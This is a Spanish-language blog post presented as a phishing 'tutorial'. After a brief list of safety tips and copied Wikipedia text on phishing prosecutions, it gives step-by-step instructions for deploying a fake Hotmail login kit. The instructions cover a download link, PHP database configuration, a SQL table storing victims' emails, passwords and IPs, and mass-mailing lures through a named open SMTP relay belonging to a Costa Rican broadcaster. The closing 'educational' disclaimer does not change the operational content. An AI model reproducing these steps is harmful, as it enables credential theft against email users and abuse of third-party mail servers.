Tutorial pishing

Esta ves veremos como evitar ser VICTIMAS , estas son mis conclusiones, lo mejor es que tu saques las tuyas si falta me la envias la agrego cuand hayas resivido el tutorial.

1). NO CONFIAR
2). NO CONFIAR EN ENLACE DE CORREOS
3). CONFIAR UN 99% EN CONEXIONES SEGURAS HTTPS://
4). CONFIAR UN 99% EN CON
5). NO CONFIAR EN "lo-que.co" PRIMERO LOS SLASH"loque.co/articuls/car"
6). Escribe la URL de la pagina antes de darle click
7). NO OLVIDE LO ANTERIOR


LO QUE LE PASOR A UN PISHER NO SE LOS RECOMIENDO

Respuestas legislativas y judiciales - SACADO DE WIKIPEDIA

El 26 de enero de 2004, la FTC (Federal Trade Commission, "Comisión Federal de Comercio") de Estados Unidos llevó a juicio el primer caso contra un phisher sospechoso. El acusado, un adolescente de California, supuestamente creó y utilizó una página web con un diseño que aparentaba ser la página de America Online para poder robar números de tarjetas de crédito.[29] Tanto Europa como Brasil siguieron la práctica de los Estados Unidos, rastreando y arrestando a presuntos phishers. A finales de marzo del 2005, un hombre estonio de 24 años fue arrestado utilizando una backdoor, a partir de que las víctimas visitaron su sitio web falso, en el que incluía un keylogger que le permitía monitorear lo que los usuarios tecleaban.[30] Del mismo modo, las autoridades arrestaron al denominado phisher kingpin, Valdir Paulo de Almeida, líder de una de las más grandes redes de phishing que en dos años había robado entre $18 a $37 millones de dólares estadounidenses.[31] En junio del 2005 las autoridades del Reino Unido arrestaron a dos hombres por la práctica del phishing,[32] en un caso conectado a la denominada Operation Firewall del Servicio Secreto de los Estados Unidos, que buscaba sitios web notorios que practicaban el phishing.[33]

En los Estados Unidos, el senador Patrick Leahy introdujo el Acta Anti-Phishing del 2005 el 1 de marzo del 2005. Esta ley federal de anti-phishing establecía que aquellos criminales que crearan páginas web falsas o enviaran spam a cuentas de e-mail con la intención de estafar a los usuarios podrían recibir una multa de hasta $250,000 USD y penas de cárcel por un término de hasta cinco años.[34]

La compañía Microsoft también se ha unido al esfuerzo de combatir el phishing. El 31 de marzo del 2005, Microsoft llevó a la Corte del Distrito de Washington 117 pleitos federales. En algunos de ellos se acusó al denominado phisher "John Doe" por utilizar varios métodos para obtener contraseñas e información confidencial. Microsoft espera desenmascarar con estos casos a varios operadores de phishing de gran envergadura. En marzo del 2005 también se consideró la asociación entre Microsoft y el gobierno de Australia para educar sobre mejoras a la ley que permitirían combatir varios crímenes cibernéticos, incluyendo el phishing.



Pasos:

1) subir los archivos a un servidor
2) crear la base de datos
3) enviar la trampa a la victima
4) revisar la base de datos

materiales:
servidor para alojar paginas web con base de datos mysql phpMyAdmin

paquete incluye:
Free SMTP Server(estesolo para usuarios avanzado) advanzed emailer hotmail_3ple-j _exploit


3ple-j_pack.rar

http://rapidshare.com/files/147877944/3ple-j_pack.rar

Size:16018 KBDownloads:0
Status:File availableLast Download:


tecnicas usadas:

En internet salen millones de nombres, estoy arto de que cada lammer ponga nombre a cada tecnica. Bueno pongamonos claro. En la web hay mucha info el 98 % ya no sirve o a sido parcheada. Esto no es una VULNERABILIDAD pues esto es montar una web, esta claro que es simulando una real. De esta forma tenemos:
Pishing scam: es el acto de pescar usuarios mediante señuelos cada vez más sofisticados,
ingieneria social: es la práctica de obtener información confidencial a través de la manipulación de usuarios legítimos
fake-email: como dice el nombre el email falso o suplantado


******************************************************************
**creando el archivo hotmail. bueno lo tuve que crear desde 0 pues los de**
**microsoft crearon un clase diferente de tablas html. entonces el_____**
** no la reconocia!!!!!!____________________________________**
******************************************************************

ok cuando tenemos esto podemos empezar...


1)
se debe consegui el hosting gratis, vamos a suponer que pusimos la pagina en lycos. ok en este paso recuerden guardar la conexion de la base de datos del hosting y su clave, es decir cuandoo se registren la pagina host, le dara su informacion , passwords, conexiones,etc.





2
entonces vamos a editar el archivo hotmail_3ple-j.zip

el archivo
hotmail_3ple-j.zip

tiene un archivo llamado logining.php y busqueda.php , bueno aqui tienen q configurar la base de datos, obviamente esto es obligatorio. ok recuerdan los datos que eles dije que guardaran anteriormente son los que deben poner en estos dos archivos ... estos archivos lo abriran con el bloc de notas o con lo que quieran....

$hostname_hot = "HOST SQL";
$database_hot = "NOMBRE DE LA TABLA";

$username_hot = "SU USERNAME";


$password_hot = "password";





Bueno ahora vamos a subir todos los archivos de la carpeta hotmail_3ple-j,
UNA PAUSA: EXPLICARE QUE ES CADA ARCHIVO:

logining.php archivo de conexiones y inserción en la base de datos

login.html pagina inicial
+
+---SAVE.png

+---IMA.png

+---login.srf_files

completed.html pagina despues de poner user y pass.
+
+---secretlogin.png


busqueda.php pagina de busqueda de correos

email.txt codigo fuente del email falso



debemos empaquetar todos los archivos como zip, pues algunos servidores host, como lycos tiene una opcion de subir zip, para no estar subiendo archivo por archivo pues es incomodo, claro tambien si sabes usar un ftp, puedes usarlo.
cuando esten los archivos previamente configurados estara listo y vamos al otro paso
aqui tendriamos listo y podemos visitar nuestra web falsa. solo para ver como quedo visualmente, si le dan iniciar sesion dara error, pues no hemos creado la base de datos.


2) crear base de datos

bueno vamos a el phpMyAdmin.

tu deberes buscar la opcion de phpMyAdmin en el servidor elegido.
Bueno pondre imagenes de mi host.

.
En la opcion nombre de la base de datos o en ingles. database name or make a new database.
Debes poner "hotmail" obviamente sin las comillas.


Cuando se haya creado entonces le daras admin, o la opcion que tenga tu servidor para administrar la basede datos. Cuando estes dentro del phpMyAdmin, deberas buscar la opcion


Deberas pegar este script sql y d
arle continuar, el cual creara las tablas donde se guardaran las claves.

CREATE TABLE `agregados` ( `id` int NOT NULL auto_increment, `email` varchar(255) , `password` varchar(255) , `ip` varchar(255) , PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=3 ;

debera dar exito completo


ahora provaremos la pagina falsa, pondremos unos datos de prueba y debera ir a una pagina DONDE DICE QUE LA CUENTA A SIDO COMPROBADA


3)

Ahora debemos hacer que la victima vaya a esa pagina... la mejor forma es usuando una tecnica de correos falso el cual llegara a la cuenta de la victima y dejara un link, el cual llegara a la pagina falsa.


Abrimos la carpeta Advaema , instalamos el mailer. Ok este es un sotfware para enviar correos es bien bonito. Todavia no sirve debemos configurar el Advanced Emailer junto con un smtp server. Que es un smt server? Bueno este es un programa que abre el puerto 25 de tu pc, esto es solo par los que saben configurarlo.Yo dejo el programa Free SMTP Server para los que saben abrir puertos en el router , proxy etc.

Los que no sabemos seguimos aqui.
Bueno ya tenemos el Advanced Emailer ahora vamos a buscar un smtp server para usarlo en el caso de los avanzados ellos usaran su propia PC, como un servidor smtp. Nosotros usaremos uno gratis buscando en internet..

Dejare una pagina muy facil de usar pero solo enviar un correo,
http://www.leegar.com.ar/BLOG/enviar-emails-anonimos/
http://usuarios.lycos.es/elcidop/emailhtml.php si vas a usar esta pagina salta de una ves, a la parte de crear contenido en el correo falso. claro no te lo recomiendo xq llega como spam con esta paginas

en cambio en el advanzed mailer podemos enviar a todos nuestros contactos. bueno vamos a configurar tenemos en el archivo smtp.txt muchos servidores, vamos escogemos uno. Ahora vamos a darle click en options, luego add luego en smtp host ponemos el servidor smtp.



jejeje anoche me di cuenta de que teletica canal 7 de costa rica tiene el servidor smtp abierto para todos.jajaj entonces vamos a poner mail.teletica.com la verdad no se si eso nos meta en problemas ,.................................. Bueno nos aseguramos de que quede marcado solo el smtp server escogido es decir (mail.teletica.com)o cualquiera de la lista que les di.







Luego para no hablar mucho. sigan los pasos como sale en las imagenes.






primero creamos un
grupo
















luego agregamos los contactos.






PONIENDO EL CODIGO HTML DEL EMAIL FALSO.
















ENVIAMOS LOS CORREOS

OK LUEGO SALDRA 4 SCROLLBAR EN PROGRESO ENVIANDO, TIENE QUE SALIR CHECKEADOS
ESO QUIERE DECIR QUE EL CORREO SE A ENVIADO, POR CADA CONTACTO QUE USTED
AGREGE VA A SALIR ESTE PROCESO.

AHORA TODO A SIDO ENVIADO SOLO VA A QUEDAR ESPERAR...A QUE LA VICTIMA REVISE
SU EMAIL.


4)
Ahora hagamos una prueba vamos a la pagina principal y ponemos cualquiercosa, como si fueramos una victima.
Entonces luego vamos a busqueda.php, obviamente esto es di poniendo la
direccion de su servidor ejemplo. lycos.hotmailfakejeje.com/busqueda.php

EN esa pagina podras buscar los emails. SIMPLE VERDAD!!!



Bueno este tutorial demostrativo no nos hacemos responsables por el uso,
pues yo no apoyo el pishing, es solo para que vean como se aprende, es
decir conocer el enemigo.

Un punto de vista de la seguridad que deberíamos tomar al navegar, viendolo
desde el lado malo(conociendo al enemigo)... Todo este tipo de operaciones son ilegales. Suplantar
paginas web esta penado por la ley...

Clase de pishing.
att: 3ple-j





1 pensamientos:

Post a Comment

feedback!